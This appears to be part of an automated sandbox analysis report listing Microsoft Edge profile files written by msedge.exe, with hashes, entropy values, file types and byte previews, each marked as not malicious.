Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.10244933715952309
Encrypted:	false
SSDEEP:	12:+dredrfLspEjVl/PnnnnnnnnnnnvoQ/Eou:+dedfEoPnnnnnnnnnnnv1j
MD5:	464350B58A92E4AAF2F9E38FB007BFAB
SHA1:	EB1A3D9FB35AC3018DE50553F20BB69D82AADC78
SHA-256:	5D50E470D64D2D3380F257A9899B0641444BFA1A782977EB8BAFB01DBBC6B239
SHA-512:	BFCC2899E1F0E6006A73CA4FB9588EFC49E7F8D8E68E7E231E1B2DEC1ACC4C871571F3F0387A2A57656AA67C51C469B36352EBA7B98872753FA56021E8246DBF
Malicious:	false
Preview:	..-.............M.......>..=..N.4..}...#.a.s....-.............M.......>..=..N.4..}...#.a.s..........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	317272
Entropy (8bit):	0.8892892532913589
Encrypted:	false
SSDEEP:	384:G2RzFImCihmJJBmVl1amA+OFamq+Y5amf+Vpam++SMamD+N7amY+2J1damT+0v80:oV
MD5:	59C27124E84DC6BD429488362ACCBA35
SHA1:	EF13569BEBE1C1AF0BA216C8E53FFFEB0AFE265A
SHA-256:	F63442F4A435D14DBB8F547BC034881E558DB4FC8186DA580F9B916719CD9CC9
SHA-512:	6D22A9E0A62F997DF0B66E4558A035ACCFCE131CD82BBE3FE2DFE0527F5F14DD9FF6DE85848E46FB9C4CE0C08543EECDA9FEB7EB553D51858F170639FA0FE927
Malicious:	false
Preview:	7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	620
Entropy (8bit):	3.276475903794905
Encrypted:	false
SSDEEP:	12:Wlc8NOuuuuuuuuuuuuuuuuuuuuuullWs:iDEl
MD5:	B6C9758EA30EBCACEA320D24579F051B
SHA1:	8B3F0F97669859E4B026217359A654E0E4DD9EFF
SHA-256:	F7852D2BFC82EE8F8139E901B32F364602D800F395FFA735BC7A457AE0BFAEC0
SHA-512:	88A1E45059B856D1E89A199739D47738FD529AA4A8E38043D1CA750E189406071DE204FED299C898E123507CFD2EBB79CF7E60189BB49BE012DE1510949323C6
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............x*..;...............#38_h.......6.Z..W.F.....~.......~...........V.e................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.233789234924357
Encrypted:	false
SSDEEP:	6:BE69+q2P923oH+TcwtfrK+IFUt8UEmSJZmw+UEVfN9VkwO923oH+TcwtfrUeLJ:BOv4Yeb23FUt8U8/+UCfF5LYeb3J
MD5:	7B7B001D711A092FA77792952EE1CCFA
SHA1:	E61D4DCB8E3AC5CEE921181FA2AD122E55FB4EDA
SHA-256:	14E59606AEE290EDE982003FAF41A559542030DF601F39A2657840D08D93510D
SHA-512:	A3D059FE1DFA8CF1AECF8D09AE2E82E19508C9811D95108270325F6130FC76631143EF2C33C8EE5AE5DACF3802C4D590BA1D2472725BE5D7BCA67F1E2C363384
Malicious:	false
Preview:	2024/12/27-01:10:31.766 1588 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-01:10:31.767 1588 Recovering log #3.2024/12/27-01:10:31.772 1588 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.233789234924357
Encrypted:	false
SSDEEP:	6:BE69+q2P923oH+TcwtfrK+IFUt8UEmSJZmw+UEVfN9VkwO923oH+TcwtfrUeLJ:BOv4Yeb23FUt8U8/+UCfF5LYeb3J
MD5:	7B7B001D711A092FA77792952EE1CCFA
SHA1:	E61D4DCB8E3AC5CEE921181FA2AD122E55FB4EDA
SHA-256:	14E59606AEE290EDE982003FAF41A559542030DF601F39A2657840D08D93510D
SHA-512:	A3D059FE1DFA8CF1AECF8D09AE2E82E19508C9811D95108270325F6130FC76631143EF2C33C8EE5AE5DACF3802C4D590BA1D2472725BE5D7BCA67F1E2C363384
Malicious:	false
Preview:	2024/12/27-01:10:31.766 1588 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-01:10:31.767 1588 Recovering log #3.2024/12/27-01:10:31.772 1588 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.059252238767438
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
MD5:	D8D8899761F621B63AD5ED6DF46D22FE
SHA1:	23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
SHA-256:	A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
SHA-512:	4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_.......f-.................__global... .\|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.214274008863988
Encrypted:	false
SSDEEP:	6:BEdF39+q2P923oH+TcwtfrzAdIFUt8UEQA3JZmw+UEQA39VkwO923oH+TcwtfrzS:BTv4Yeb9FUt8UyZ/+Uyz5LYeb2J
MD5:	88244E412704CFA5B6876F1E0869EB6E
SHA1:	8D9C236762D32D41316D2C5CBB989F565F634AD5
SHA-256:	BBC26429DF3DFF72B45796E199382B2171B8854757174F780FC91C85641DDD15
SHA-512:	CAE2832EEE490D43B86064424793EA87F03CB23F892075877D3328C1B9C3957787ABBEE0459B864A0DCB1139EC4E1A5A4362A5ADFCC2D9FDBC65D6B8CF525327
Malicious:	false
Preview:	2024/12/27-01:10:31.758 1588 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-01:10:31.761 1588 Recovering log #3.2024/12/27-01:10:31.761 1588 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.214274008863988
Encrypted:	false
SSDEEP:	6:BEdF39+q2P923oH+TcwtfrzAdIFUt8UEQA3JZmw+UEQA39VkwO923oH+TcwtfrzS:BTv4Yeb9FUt8UyZ/+Uyz5LYeb2J
MD5:	88244E412704CFA5B6876F1E0869EB6E
SHA1:	8D9C236762D32D41316D2C5CBB989F565F634AD5
SHA-256:	BBC26429DF3DFF72B45796E199382B2171B8854757174F780FC91C85641DDD15
SHA-512:	CAE2832EEE490D43B86064424793EA87F03CB23F892075877D3328C1B9C3957787ABBEE0459B864A0DCB1139EC4E1A5A4362A5ADFCC2D9FDBC65D6B8CF525327
Malicious:	false
Preview:	2024/12/27-01:10:31.758 1588 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-01:10:31.761 1588 Recovering log #3.2024/12/27-01:10:31.761 1588 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43c59.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43dc1.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43f67.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43f76.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF466f4.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF46742.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
